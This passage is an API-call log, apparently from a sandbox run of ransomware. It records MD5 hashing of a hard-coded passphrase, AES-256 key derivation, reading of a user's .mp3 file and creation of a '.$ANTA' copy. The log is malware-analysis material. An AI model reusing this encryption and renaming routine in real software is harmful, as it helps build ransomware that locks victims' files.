lpUsedDefaultChar=0x0) returned 20 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.337] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0117.338] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.338] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4508) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0117.340] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0117.340] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.340] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0117.340] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.341] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.341] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.341] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.341] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caf70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0117.341] CryptCreateHash (in: hProv=0x41a4508, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0117.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.341] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0117.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.341] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cae08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0117.342] CryptHashData (hHash=0x41ac280, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0117.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.342] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0117.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caf88, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0117.342] CryptDeriveKey (in: hProv=0x41a4508, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac780) returned 1 [0117.342] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0117.342] CryptDestroyHash (hHash=0x41ac280) returned 1 [0117.349] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\glkh.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0117.349] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.349] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0117.349] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9940 [0117.350] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0117.351] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq")) returned 0x10 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0117.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\Glkh.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\glkh.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0117.351] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0117.352] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0117.352] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0117.355] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0117.355] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x65cf, lpOverlapped=0x0) returned 1 [0117.357] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0117.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x65cf) returned 0x4516010 [0117.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0117.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0117.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0117.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x65cf) returned 0x451c5e8 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.361] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x65cf) returned 0x4516010 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.361] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0117.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 